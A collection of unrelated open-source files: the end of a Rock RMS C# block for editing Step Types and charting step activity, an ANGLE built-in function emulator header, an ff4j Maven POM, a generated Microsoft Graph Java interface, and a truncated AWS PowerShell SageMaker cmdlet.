string title ) { Attribute attribute; if ( attributeGuid.Equals( Guid.Empty ) ) { attribute = new Attribute(); attribute.FieldTypeId = FieldTypeCache.Get( Rock.SystemGuid.FieldType.TEXT ).Id; } else { attribute = AttributesState.First( a => a.Guid.Equals( attributeGuid ) ); } edtAttributes.ActionTitle = title; var reservedKeyNames = new List<string>(); AttributesState.Where( a => !a.Guid.Equals( attributeGuid ) ).Select( a => a.Key ).ToList().ForEach( a => reservedKeyNames.Add( a ) ); edtAttributes.AllowSearchVisible = true; edtAttributes.ReservedKeyNames = reservedKeyNames.ToList(); edtAttributes.SetAttributeProperties( attribute, attachToEntityType ); hfActiveDialog.Value = "ATTRIBUTES"; dlgAttribute.Show(); } /// <summary> /// Hide the Attribute Definition Properties Dialog. /// </summary> private void HideAttributeDefinitionDialog() { dlgAttribute.Hide(); hfActiveDialog.Value = string.Empty; } /// <summary> /// Handles the SaveClick event of the dlgConnectionTypeAttribute control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> protected void dlgAttribute_SaveClick( object sender, EventArgs e ) { Rock.Model.Attribute attribute = new Rock.Model.Attribute(); edtAttributes.GetAttributeProperties( attribute ); // Controls will show warnings if ( !attribute.IsValid ) { return; } if ( AttributesState.Any( a => a.Guid.Equals( attribute.Guid ) ) ) { attribute.Order = AttributesState.Where( a => a.Guid.Equals( attribute.Guid ) ).FirstOrDefault().Order; AttributesState.RemoveEntity( attribute.Guid ); } else { attribute.Order = AttributesState.Any() ? AttributesState.Max( a => a.Order ) + 1 : 0; } AttributesState.Add( attribute ); ReOrderAttributes( AttributesState ); BindAttributesGrid(); HideAttributeDefinitionDialog(); } /// <summary> /// Binds the Connection Type attributes grid. /// </summary> private void BindAttributesGrid() { gAttributes.DataSource = AttributesState .OrderBy( a => a.Order ) .ThenBy( a => a.Name ) .Select( a => new { a.Id, a.Guid, a.Name, a.Description, FieldType = FieldTypeCache.GetName( a.FieldTypeId ), a.IsRequired, a.IsGridColumn, a.AllowSearch } ) .ToList(); gAttributes.DataBind(); } /// <summary> /// Reorders the attribute list. /// </summary> /// <param name="itemList">The item list.</param> /// <param name="oldIndex">The old index.</param> /// <param name="newIndex">The new index.</param> private void SortAttributes( List<Attribute> attributeList, int oldIndex, int newIndex ) { var movedItem = attributeList.Where( a => a.Order == oldIndex ).FirstOrDefault(); if ( movedItem != null ) { if ( newIndex < oldIndex ) { // Moved up foreach ( var otherItem in attributeList.Where( a => a.Order < oldIndex && a.Order >= newIndex ) ) { otherItem.Order = otherItem.Order + 1; } } else { // Moved Down foreach ( var otherItem in attributeList.Where( a => a.Order > oldIndex && a.Order <= newIndex ) ) { otherItem.Order = otherItem.Order - 1; } } movedItem.Order = newIndex; } } /// <summary> /// Reorders the attributes. /// </summary> /// <param name="attributeList">The attribute list.</param> private void ReOrderAttributes( List<Attribute> attributeList ) { attributeList = attributeList.OrderBy( a => a.Order ).ToList(); int order = 0; attributeList.ForEach( a => a.Order = order++ ); } #endregion #region Internal Methods /// <summary> /// Retrieve a singleton data context for data operations in this block. /// </summary> /// <returns></returns> private RockContext GetDataContext() { if ( _dataContext == null ) { _dataContext = new RockContext(); } return _dataContext; } /// <summary> /// Initialize handlers for block configuration changes. /// </summary> /// <param name="triggerPanel"></param> private void InitializeSettingsNotification( UpdatePanel triggerPanel ) { // Set up Block Settings change notification. BlockUpdated += Block_BlockUpdated; AddConfigurationUpdateTrigger( triggerPanel ); } /// <summary> /// Initialize the essential context in which this block is operating. /// </summary> /// <returns>True, if the block context is valid.</returns> private bool InitializeBlockContext() { _stepProgramId = PageParameter( PageParameterKey.StepProgramId ).AsInteger(); _stepTypeId = PageParameter( PageParameterKey.StepTypeId ).AsInteger(); if ( _stepProgramId == 0 && _stepTypeId == 0 ) { ShowNotification( "A new Step cannot be added because there is no Step Program available in this context.", NotificationBoxType.Danger, true ); return false; } return true; } /// <summary> /// Populate the selection list for Workflow Trigger Types. /// </summary> private void LoadWorkflowTriggerTypesSelectionList() { ddlTriggerType.Items.Add( new ListItem( "Step Completed", StepWorkflowTrigger.WorkflowTriggerCondition.IsComplete.ToString() ) ); ddlTriggerType.Items.Add( new ListItem( "Status Changed", StepWorkflowTrigger.WorkflowTriggerCondition.StatusChanged.ToString() ) ); ddlTriggerType.Items.Add( new ListItem( "Manual", StepWorkflowTrigger.WorkflowTriggerCondition.Manual.ToString() ) ); } /// <summary> /// Populate the selection list for Prerequisite Steps. /// </summary> private void LoadPrerequisiteStepsList() { var dataContext = GetDataContext(); // Load available Prerequisite Steps. var stepType = GetStepType(); int programId = 0; if ( stepType != null ) { programId = stepType.StepProgramId; } if ( programId == 0 ) { programId = _stepProgramId; } var stepsService = new StepTypeService( dataContext ); List<StepType> prerequisiteStepTypes; if ( _stepTypeId == 0 ) { prerequisiteStepTypes = stepsService.Queryable().Where( x => x.StepProgramId == programId && x.IsActive ).ToList(); } else { prerequisiteStepTypes = stepsService.GetEligiblePrerequisiteStepTypes( _stepTypeId ).ToList(); } cblPrerequsities.DataSource = prerequisiteStepTypes; cblPrerequsities.DataBind(); cblPrerequsities.Visible = prerequisiteStepTypes.Count > 0; } /// <summary> /// Shows the detail panel containing the main content of the block. /// </summary> /// <param name="stepTypeId">The entity id of the item to be shown.</param> public void ShowDetail( int stepTypeId ) { pnlDetails.Visible = false; var dataContext = GetDataContext(); // Get the Step Type data model var stepType = GetStepType( stepTypeId ); if ( stepType.Id != 0 ) { pdAuditDetails.SetEntity( stepType, ResolveRockUrl( "~" ) ); } else { // hide the panel drawer that show created and last modified dates pdAuditDetails.Visible = false; } // Admin rights are required to edit a Step Type. Edit rights only allow adding/removing items. bool adminAllowed = UserCanAdministrate || stepType.IsAuthorized( Authorization.ADMINISTRATE, CurrentPerson ); pnlDetails.Visible = true; hfStepTypeId.Value = stepType.Id.ToString(); lIcon.Text = string.Format( "<i class='{0}'></i>", stepType.IconCssClass ); bool readOnly = false; nbEditModeMessage.Text = string.Empty; if ( !adminAllowed ) { readOnly = true; nbEditModeMessage.Text = EditModeMessage.ReadOnlyEditActionNotAllowed( StepProgram.FriendlyTypeName ); } if ( readOnly ) { btnEdit.Visible = false; btnDelete.Visible = false; btnSecurity.Visible = false; ShowReadonlyDetails( stepType ); } else { btnEdit.Visible = true; btnDelete.Visible = true; btnSecurity.Visible = true; btnSecurity.Title = "Secure " + stepType.Name; btnSecurity.EntityId = stepType.Id; if ( !stepTypeId.Equals( 0 ) ) { ShowReadonlyDetails( stepType ); } else { ShowEditDetails( stepType ); } } // Set availability of Bulk Entry action. var showBulkEntry = GetAttributeValue( AttributeKey.BulkEntryPage ).IsNotNullOrWhiteSpace() && this.UserCanEdit && stepType.IsAuthorized( Authorization.EDIT, CurrentPerson ); btnBulkEntry.Visible = showBulkEntry; } /// <summary> /// Shows the edit details. /// </summary> /// <param name="stepType">The entity instance to be displayed.</param> private void ShowEditDetails( StepType stepType ) { if ( stepType == null ) { stepType = new StepType(); stepType.IconCssClass = "fa fa-compress"; } if ( stepType.Id == 0 ) { lReadOnlyTitle.Text = ActionTitle.Add( StepType.FriendlyTypeName ).FormatAsHtmlTitle(); } else { lReadOnlyTitle.Text = stepType.Name.FormatAsHtmlTitle(); } SetEditMode( true ); LoadAttributeDefinitions( new Step().TypeId, "StepTypeId", stepType.Id ); LoadPrerequisiteStepsList(); LoadWorkflowTriggerTypesSelectionList(); // General properties tbName.Text = stepType.Name; cbIsActive.Checked = stepType.IsActive; tbDescription.Text = stepType.Description; tbIconCssClass.Text = stepType.IconCssClass; cpHighlight.Text = stepType.HighlightColor; cbAllowMultiple.Checked = stepType.AllowMultiple; cbHasDuration.Checked = stepType.HasEndDate; cbShowBadgeCount.Checked = stepType.ShowCountOnBadge; // Pre-requisites if ( stepType.StepTypePrerequisites != null ) { cblPrerequsities.SetValues( stepType.StepTypePrerequisites.Select( x => x.PrerequisiteStepTypeId ) ); } // Advanced Settings dvpAutocomplete.SetValue( stepType.AutoCompleteDataViewId ); dvpAudience.SetValue( stepType.AudienceDataViewId ); cbAllowEdit.Checked = stepType.AllowManualEditing; ceCardTemplate.Text = stepType.CardLavaTemplate; // Workflow Triggers WorkflowsState = new List<StepWorkflowTriggerViewModel>(); foreach ( var trigger in stepType.StepWorkflowTriggers ) { var newItem = new StepWorkflowTriggerViewModel( trigger ); WorkflowsState.Add( newItem ); } BindAttributesGrid(); BindStepWorkflowsGrid(); } /// <summary> /// Shows the readonly details. /// </summary> /// <param name="stepType">The entity instance to be displayed.</param> private void ShowReadonlyDetails( StepType stepType ) { SetEditMode( false ); hfStepTypeId.SetValue( stepType.Id ); WorkflowsState = null; lReadOnlyTitle.Text = stepType.Name.FormatAsHtmlTitle(); // Create the read-only description text. var descriptionListMain = new DescriptionList(); descriptionListMain.Add( "Description", stepType.Description ); lStepTypeDescription.Text = descriptionListMain.Html; // Configure Label: Inactive hlInactive.Visible = !stepType.IsActive; RefreshChart(); } /// <summary> /// Delete the current record. /// </summary> private void DeleteRecord() { var rockContext = GetDataContext(); var stepTypeService = new StepTypeService( rockContext ); var stepType = GetStepType( forceLoadFromContext: true ); if ( stepType != null ) { if ( !stepType.IsAuthorized( Authorization.ADMINISTRATE, this.CurrentPerson ) ) { mdDeleteWarning.Show( "You are not authorized to delete this item.", ModalAlertType.Information ); return; } string errorMessage; if ( !stepTypeService.CanDelete( stepType, out errorMessage ) ) { mdDeleteWarning.Show( errorMessage, ModalAlertType.Information ); return; } stepTypeService.Delete( stepType ); rockContext.SaveChanges(); } GoToStepProgramPage(); } /// <summary> /// Gets the specified Step Type data model, or the current model if none is specified. /// </summary> /// <param name="stepType">The entity id of the instance to be retrieved.</param> /// <returns></returns> private StepType GetStepType( int? stepTypeId = null, bool forceLoadFromContext = false ) { if ( stepTypeId == null ) { stepTypeId = hfStepTypeId.ValueAsInt(); } string key = string.Format( "StepType:{0}", stepTypeId ); StepType stepType = null; if ( !forceLoadFromContext ) { stepType = RockPage.GetSharedItem( key ) as StepType; } if ( stepType == null ) { var dataContext = GetDataContext(); stepType = new StepTypeService( dataContext ).Queryable() .Where( c => c.Id == stepTypeId ) .FirstOrDefault(); if ( stepType == null ) { stepType = new StepType { Id = 0 }; } RockPage.SaveSharedItem( key, stepType ); } if ( _stepProgramId == default( int ) ) { _stepProgramId = stepType.StepProgramId; } return stepType; } private int GetActiveStepTypeId() { return hfStepTypeId.ValueAsInt(); } /// <summary> /// Sets the edit mode. /// </summary> /// <param name="editable">if set to <c>true</c> [editable].</param> private void SetEditMode( bool editable ) { pnlEditDetails.Visible = editable; pnlViewDetails.Visible = !editable; HideSecondaryBlocks( editable ); } /// <summary> /// Shows the dialog. /// </summary> /// <param name="dialog">The dialog.</param> /// <param name="setValues">if set to <c>true</c> [set values].</param> private void ShowDialog( string dialog, bool setValues = false ) { hfActiveDialog.Value = dialog.ToUpper().Trim(); ShowDialog( setValues ); } /// <summary> /// Shows the dialog. /// </summary> /// <param name="setValues">if set to <c>true</c> [set values].</param> private void ShowDialog( bool setValues = false ) { switch ( hfActiveDialog.Value ) { case "STEPWORKFLOWS": dlgStepWorkflow.Show(); break; } } /// <summary> /// Hides the dialog. /// </summary> private void HideDialog() { switch ( hfActiveDialog.Value ) { case "STEPWORKFLOWS": dlgStepWorkflow.Hide(); break; } hfActiveDialog.Value = string.Empty; } #endregion #region Step Activity Chart /// <summary> /// Add scripts for Chart.js components /// </summary> private void InitializeChartScripts() { // NOTE: moment.js must be loaded before Chart.js RockPage.AddScriptLink( "~/Scripts/moment.min.js", true ); RockPage.AddScriptLink( "~/Scripts/Chartjs/Chart.js", true ); } /// <summary> /// Initialize the chart by applying block configuration settings. /// </summary> private void InitializeChartFilter() { // Set the default Date Range from the block settings. var dateRangeSettings = GetAttributeValue( AttributeKey.SlidingDateRange ); if ( !string.IsNullOrEmpty( dateRangeSettings ) ) { drpSlidingDateRange.DelimitedValues = dateRangeSettings; } if ( drpSlidingDateRange.SlidingDateRangeMode == SlidingDateRangePicker.SlidingDateRangeType.All ) { // Default to current year drpSlidingDateRange.SlidingDateRangeMode = SlidingDateRangePicker.SlidingDateRangeType.Current; drpSlidingDateRange.TimeUnit = SlidingDateRangePicker.TimeUnitType.Year; } } /// <summary> /// Refresh the chart using the current filter settings. /// </summary> private void RefreshChart() { // Set the visibility of the Activity Summary chart. bool showActivitySummary = GetAttributeValue( AttributeKey.ShowChart ).AsBoolean( true ); if ( showActivitySummary ) { // If the Step Type does not have any activity, hide the Activity Summary. var dataContext = GetDataContext(); var stepService = new StepService( dataContext ); var stepsQuery = stepService.Queryable().AsNoTracking() .Where( x => x.StepTypeId == _stepTypeId ); showActivitySummary = stepsQuery.Any(); } pnlActivitySummary.Visible = showActivitySummary; if ( !showActivitySummary ) { return; } // Get chart data and set visibility of related elements. var reportPeriod = new TimePeriod( drpSlidingDateRange.DelimitedValues ); var chartFactory = this.GetChartJsFactory( reportPeriod ); chartCanvas.Visible = chartFactory.HasData; nbActivityChartMessage.Visible = !chartFactory.HasData; if ( !chartFactory.HasData ) { // If no data, show a notification. nbActivityChartMessage.Text = "There are no Steps matching the current filter."; return; } // Add client script to construct the chart. var chartDataJson = chartFactory.GetJson( sizeToFitContainerWidth: true, maintainAspectRatio: false ); string script = string.Format( @" var barCtx = $('#{0}')[0].getContext('2d'); var barChart = new Chart(barCtx, {1});", chartCanvas.ClientID, chartDataJson ); ScriptManager.RegisterStartupScript( this.Page, this.GetType(), "stepTypeActivityChartScript", script, true ); } /// <summary> /// Gets a configured factory that creates the data required for the chart. /// </summary> /// <returns></returns> public ChartJsTimeSeriesDataFactory<ChartJsTimeSeriesDataPoint> GetChartJsFactory( TimePeriod reportPeriod ) { var dataContext = GetDataContext(); var stepService = new StepService( dataContext ); // Get the Steps associated with the current Step Type. var stepsStartedQuery = stepService.Queryable().AsNoTracking() .Where( x => x.StepTypeId == _stepTypeId && x.StepType.IsActive && x.StartDateTime != null ); var stepsCompletedQuery = stepService.Queryable().AsNoTracking() .Where( x => x.StepTypeId == _stepTypeId && x.StepType.IsActive && x.CompletedDateTime != null ); var dateRange = reportPeriod.GetDateRange(); var startDate = dateRange.Start; var endDate = dateRange.End; if ( startDate != null ) { startDate = startDate.Value.Date; stepsStartedQuery = stepsStartedQuery.Where( x => x.StartDateTime >= startDate ); stepsCompletedQuery = stepsCompletedQuery.Where( x => x.CompletedDateTime >= startDate ); } if ( endDate != null ) { var compareDate = endDate.Value.Date.AddDays( 1 ); stepsStartedQuery = stepsStartedQuery.Where( x => x.StartDateTime < compareDate ); stepsCompletedQuery = stepsCompletedQuery.Where( x => x.CompletedDateTime < compareDate ); } // Initialize a new Chart Factory. var factory = new ChartJsTimeSeriesDataFactory<ChartJsTimeSeriesDataPoint>(); if ( reportPeriod.TimeUnit == TimePeriodUnitSpecifier.Year ) { factory.TimeScale = ChartJsTimeSeriesTimeScaleSpecifier.Month; } else { factory.TimeScale = ChartJsTimeSeriesTimeScaleSpecifier.Day; } factory.StartDateTime = startDate; factory.EndDateTime = endDate; factory.ChartStyle = ChartJsTimeSeriesChartStyleSpecifier.Line; // Determine the appropriate date grouping for the chart data points. Func<Step, DateTime> groupKeySelector; if ( factory.TimeScale == ChartJsTimeSeriesTimeScaleSpecifier.Day ) { // Group Steps by Start Date. groupKeySelector = ( x => x.StartDateTime.Value.Date ); } else { // Group Steps by Start Date rounded to beginning of the month. groupKeySelector = ( x => new DateTime( x.StartDateTime.Value.Year, x.StartDateTime.Value.Month, 1 ) ); } // Add data series for Steps started. var startedSeriesDataPoints = stepsStartedQuery.ToList() .GroupBy( groupKeySelector ) .Select( x => new ChartDatasetInfo { DatasetName = "Started", DateTime = x.Key, Value = x.Count(), SortKey = "1" } ); if ( factory.TimeScale == ChartJsTimeSeriesTimeScaleSpecifier.Day ) { // Group Steps by Completed Date. groupKeySelector = ( x => x.CompletedDateTime.Value.Date ); } else { // Group Steps by Completed Date rounded to beginning of the month. groupKeySelector = ( x => new DateTime( x.CompletedDateTime.Value.Year, x.CompletedDateTime.Value.Month, 1 ) ); } // Add data series for Steps completed. var completedSeriesDataPoints = stepsCompletedQuery.ToList() .GroupBy( groupKeySelector ) .Select( x => new ChartDatasetInfo { DatasetName = "Completed", DateTime = x.Key, Value = x.Count(), SortKey = "2" } ); var allDataPoints = startedSeriesDataPoints.Union( completedSeriesDataPoints ).OrderBy( x => x.SortKey ).ThenBy( x => x.DateTime ); var dataSetNames = allDataPoints.Select( x => x.DatasetName ).Distinct().ToList(); // Add Dataset for Steps Started. var colorStarted = new RockColor( ChartJsConstants.Colors.Blue ); var startedDataset = this.CreateDataSet( allDataPoints, "Started", colorStarted.ToHex() ); factory.Datasets.Add( startedDataset ); // Add Dataset for Steps Completed. var colorCompleted = new RockColor( ChartJsConstants.Colors.Green ); var completedDataset = this.CreateDataSet( allDataPoints, "Completed", colorCompleted.ToHex() ); factory.Datasets.Add( completedDataset ); return factory; } private ChartJsTimeSeriesDataset CreateDataSet( IOrderedEnumerable<ChartDatasetInfo> allDataPoints, string datasetName, string colorString ) { var dataset = new ChartJsTimeSeriesDataset(); dataset.Name = datasetName; dataset.DataPoints = allDataPoints .Where( x => x.DatasetName == datasetName ) .Select( x => new ChartJsTimeSeriesDataPoint { DateTime = x.DateTime, Value = x.Value } ) .Cast<IChartJsTimeSeriesDataPoint>() .ToList(); dataset.BorderColor = colorString; return dataset; } #endregion #region Support Classes [Serializable] private class StepWorkflowTriggerViewModel { public int Id { get; set; } public Guid Guid { get; set; } public string WorkflowTypeName { get; set; } public int? StepTypeId { get; set; } public int WorkflowTypeId { get; set; } public StepWorkflowTrigger.WorkflowTriggerCondition TriggerType { get; set; } public string TypeQualifier { get; set; } public string TriggerDescription { get; set; } public StepWorkflowTriggerViewModel() { // } public StepWorkflowTriggerViewModel( StepWorkflowTrigger trigger ) { Id = trigger.Id; Guid = trigger.Guid; StepTypeId = trigger.StepTypeId; TriggerType = trigger.TriggerType; TypeQualifier = trigger.TypeQualifier; if ( trigger.WorkflowType != null ) { WorkflowTypeId = trigger.WorkflowType.Id; WorkflowTypeName = trigger.WorkflowType.Name; } } } /// <summary> /// Stores information about a dataset to be displayed on a chart. /// </summary> private class ChartDatasetInfo { public string DatasetName { get; set; } public DateTime DateTime { get; set; } public int Value { get; set; } public string SortKey { get; set; } } #endregion #region Block Notifications private NotificationBox _notificationControl; private Control _detailContainerControl; /// <summary> /// Initialize block-level notification message handlers for block configuration changes. /// </summary> /// <param name="triggerPanel"></param> private void InitializeBlockNotification( NotificationBox notificationControl, Control detailContainerControl ) { _notificationControl = notificationControl; _detailContainerControl = detailContainerControl; ClearBlockNotification(); } /// <summary> /// Reset the notification message for the block. /// </summary> public void ClearBlockNotification() { _notificationControl.Visible = false; _detailContainerControl.Visible = true; } /// <summary> /// Show a notification message for the block. /// </summary> /// <param name="notificationControl"></param> /// <param name="message"></param> /// <param name="notificationType"></param> public void ShowNotification( string message, NotificationBoxType notificationType = NotificationBoxType.Info, bool hideBlockContent = false ) { _notificationControl.Text = message; _notificationControl.NotificationBoxType = notificationType; _notificationControl.Visible = true; _detailContainerControl.Visible = !hideBlockContent; } #endregion } }
{ "pile_set_name": "Github" }
// // Copyright 2011 The ANGLE Project Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. // #ifndef COMPILER_TRANSLATOR_BUILTINFUNCTIONEMULATOR_H_ #define COMPILER_TRANSLATOR_BUILTINFUNCTIONEMULATOR_H_ #include "compiler/translator/InfoSink.h" namespace sh { class TIntermNode; class TFunction; class TSymbolUniqueId; using BuiltinQueryFunc = const char *(int); // // This class decides which built-in functions need to be replaced with the emulated ones. It can be // used to work around driver bugs or implement functions that are not natively implemented on a // specific platform. // class BuiltInFunctionEmulator { public: BuiltInFunctionEmulator(); void markBuiltInFunctionsForEmulation(TIntermNode *root); void cleanup(); // "name" gets written as "name_emu". static void WriteEmulatedFunctionName(TInfoSinkBase &out, const char *name); bool isOutputEmpty() const; // Output function emulation definition. This should be before any other shader source. void outputEmulatedFunctions(TInfoSinkBase &out) const; // Add functions that need to be emulated. void addEmulatedFunction(const TSymbolUniqueId &uniqueId, const char *emulatedFunctionDefinition); void addEmulatedFunctionWithDependency(const TSymbolUniqueId &dependency, const TSymbolUniqueId &uniqueId, const char *emulatedFunctionDefinition); void addFunctionMap(BuiltinQueryFunc queryFunc); private: class BuiltInFunctionEmulationMarker; // Records that a function is called by the shader and might need to be emulated. If the // function is not in mEmulatedFunctions, this becomes a no-op. Returns true if the function // call needs to be replaced with an emulated one. bool setFunctionCalled(const TFunction *function); bool setFunctionCalled(int uniqueId); const char *findEmulatedFunction(int uniqueId) const; // Map from function unique id to emulated function definition std::map<int, std::string> mEmulatedFunctions; // Map from dependent functions to their dependencies. This structure allows each function to // have at most one dependency. std::map<int, int> mFunctionDependencies; // Called function ids std::vector<int> mFunctions; // Constexpr function tables. std::vector<BuiltinQueryFunc *> mQueryFunctions; }; } // namespace sh #endif // COMPILER_TRANSLATOR_BUILTINFUNCTIONEMULATOR_H_
{ "pile_set_name": "Github" }
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <!-- ~ COORDINATES ~ --> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <artifactId>ff4j-store-commonsconfig</artifactId> <packaging>jar</packaging> <name>ff4j-store-commonsconfig</name> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <!-- ~ PARENT ~ --> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <parent> <groupId>org.ff4j</groupId> <artifactId>ff4j-parent</artifactId> <version>1.8.10-SNAPSHOT</version> </parent> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <!-- ~ PROPERTIES ~ --> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <properties> <license.licenseResolver>${project.baseUri}/../src/license</license.licenseResolver> <commonsconfig.version>1.10</commonsconfig.version> </properties> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <!-- ~ DEPENDENCIES ~ --> <!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --> <dependencies> <!-- logger --> <dependency> <groupId>org.ff4j</groupId> <artifactId>ff4j-core</artifactId> <version>${project.version}</version> </dependency> <!-- CommonsConfig --> <dependency> <groupId>commons-configuration</groupId> <artifactId>commons-configuration</artifactId> <version>${commonsconfig.version}</version> </dependency> <!-- Tests --> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <scope>test</scope> </dependency> <dependency> <groupId>org.ff4j</groupId> <artifactId>ff4j-test</artifactId> <version>${project.version}</version> <scope>test</scope> </dependency> <dependency> <groupId>org.slf4j</groupId> <artifactId>jcl-over-slf4j</artifactId> <scope>test</scope> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-classic</artifactId> <scope>test</scope> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-test</artifactId> <scope>test</scope> </dependency> </dependencies> </project>
{ "pile_set_name": "Github" }
// ------------------------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information. // ------------------------------------------------------------------------------ package com.microsoft.graph.requests.extensions; import com.microsoft.graph.http.IRequestBuilder; import com.microsoft.graph.core.ClientException; import com.microsoft.graph.concurrency.ICallback; import com.microsoft.graph.models.extensions.TermsAndConditions; import com.microsoft.graph.models.extensions.TermsAndConditionsAssignment; import java.util.Arrays; import java.util.EnumSet; import com.microsoft.graph.requests.extensions.ITermsAndConditionsAssignmentRequestBuilder; import com.microsoft.graph.requests.extensions.ITermsAndConditionsAssignmentCollectionRequest; import com.microsoft.graph.http.IBaseCollectionPage; // **NOTE** This file was generated by a tool and any changes will be overwritten. /** * The interface for the Terms And Conditions Assignment Collection Request Builder. */ public interface ITermsAndConditionsAssignmentCollectionRequestBuilder extends IRequestBuilder { /** * Creates the request * * @param requestOptions the options for this request * @return the IUserRequest instance */ ITermsAndConditionsAssignmentCollectionRequest buildRequest(final com.microsoft.graph.options.Option... requestOptions); /** * Creates the request * * @param requestOptions the options for this request * @return the IUserRequest instance */ ITermsAndConditionsAssignmentCollectionRequest buildRequest(final java.util.List<? extends com.microsoft.graph.options.Option> requestOptions); ITermsAndConditionsAssignmentRequestBuilder byId(final String id); }
{ "pile_set_name": "Github" }
/******************************************************************************* * Copyright 2012-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * Licensed under the Apache License, Version 2.0 (the "License"). You may not use * this file except in compliance with the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. * This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * ***************************************************************************** * * AWS Tools for Windows (TM) PowerShell (TM) * */ using System; using System.Collections.Generic; using System.Linq; using System.Management.Automation; using System.Text; using Amazon.PowerShell.Common; using Amazon.Runtime; using Amazon.SageMaker; using Amazon.SageMaker.Model; namespace Amazon.PowerShell.Cmdlets.SM { /// <summary> /// Returns information about a transform job. /// </summary> [Cmdlet("Get", "SMTransformJob")] [OutputType("Amazon.SageMaker.Model.DescribeTransformJobResponse")] [AWSCmdlet("Calls the Amazon SageMaker Service DescribeTransformJob API operation.", Operation = new[] {"DescribeTransformJob"}, SelectReturnType = typeof(Amazon.SageMaker.Model.DescribeTransformJobResponse))] [AWSCmdletOutput("Amazon.SageMaker.Model.DescribeTransformJobResponse", "This cmdlet returns an Amazon.SageMaker.Model.DescribeTransformJobResponse object containing multiple properties. The object can also be referenced from properties attached to the cmdlet entry in the $AWSHistory stack." )] public partial class GetSMTransformJobCmdlet : AmazonSageMakerClientCmdlet, IExecutor { #region Parameter TransformJobName /// <summary> /// <para> /// <para>The name of the transform job that you want to view details of.</para> /// </para> /// </summary> #if !MODULAR [System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true)] #else [System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true, Mandatory = true)] [System.Management.Automation.AllowEmptyString] [System.Management.Automation.AllowNull] #endif [Amazon.PowerShell.Common.AWSRequiredParameter] public System.String TransformJobName { get; set; } #endregion #region Parameter Select /// <summary> /// Use the -Select parameter to control the cmdlet output. The default value is '*'. /// Specifying -Select '*' will result in the cmdlet returning the whole service response (Amazon.SageMaker.Model.DescribeTransformJobResponse). /// Specifying the name of a property of type Amazon.SageMaker.Model.DescribeTransformJobResponse will result in that property being returned. /// Specifying -Select '^ParameterName' will result in the cmdlet returning the selected cmdlet parameter value. /// </summary> [System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)] public string Select { get; set; } = "*"; #endregion #region Parameter PassThru /// <summary> /// Changes the cmdlet behavior to return the value passed to the TransformJobName parameter. /// The -PassThru parameter is deprecated, use -Select '^TransformJobName' instead. This parameter will be removed in a future version. /// </summary> [System.Obsolete("The -PassThru parameter is deprecated, use -Select '^TransformJobName' instead. This parameter will be removed in a future version.")] [System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)] public SwitchParameter PassThru { get; set; } #endregion protected override void ProcessRecord() { base.ProcessRecord(); var context = new CmdletContext(); // allow for manipulation of parameters prior to loading into context PreExecutionContextLoad(context); #pragma warning disable CS0618, CS0612 //A class member was marked with the Obsolete attribute if (ParameterWasBound(nameof(this.Select))) { context.Select = CreateSelectDelegate<Amazon.SageMaker.Model.DescribeTransformJobResponse, GetSMTransformJobCmdlet>(Select) ?? throw new System.ArgumentException("Invalid value for -Select parameter.", nameof(this.Select)); if (this.PassThru.IsPresent) { throw new System.ArgumentException("-PassThru cannot be used when -Select is specified.", nameof(this.Select)); } } else if (this.PassThru.IsPresent) { context.Select = (response, cmdlet) => this.TransformJobName; } #pragma warning restore CS0618, CS0612 //A class member was marked with the Obsolete attribute context.TransformJobName = this.TransformJobName; #if MODULAR if (this.TransformJobName == null && ParameterWasBound(nameof(this.TransformJobName))) { WriteWarning("You are passing $null as a value for parameter TransformJobName which is marked as required. In case you believe this parameter was incorrectly marked as required, report this by opening an issue at https://github.com/aws/aws-tools-for-powershell/issues."); } #endif // allow further manipulation of loaded context prior to processing PostExecutionContextLoad(context); var output = Execute(context) as CmdletOutput; ProcessOutput(output); } #region IExecutor Members public object Execute(ExecutorContext context) { var cmdletContext = context as CmdletContext; // create request var request = new Amazon.SageMaker.Model.DescribeTransformJobRequest(); if (cmdletContext.TransformJobName != null) { request.TransformJobName = cmdletContext.TransformJobName; } CmdletOutput output; // issue call var client = Client ?? CreateClient(_CurrentCredentials, _RegionEndpoint); try { var response = CallAWSServiceOperation(client, request); object pipelineOutput = null; pipelineOutput = cmdletContext.Select(response, this); output = new CmdletOutput { PipelineOutput = pipelineOutput, ServiceResponse = response }; } catch (Exception e) { output = new CmdletOutput { ErrorResponse = e }; } return output; } public ExecutorContext CreateContext() { return new CmdletContext(); } #endregion #region AWS Service Operation Call private Amazon.SageMaker.Model.DescribeTransformJobResponse CallAWSServiceOperation(IAmazonSageMaker client, Amazon.SageMaker.Model.DescribeTransformJobRequest request) { Utils.Common.WriteVerboseEndpointMessage(this, client.Config, "Amazon SageMaker Service", "DescribeTransformJob"); try { #if DESKTOP return client.DescribeTransformJob(request); #elif CORECLR return client.DescribeTransformJobAsync(request).GetAwaiter().GetResult(); #else #error "Unknown 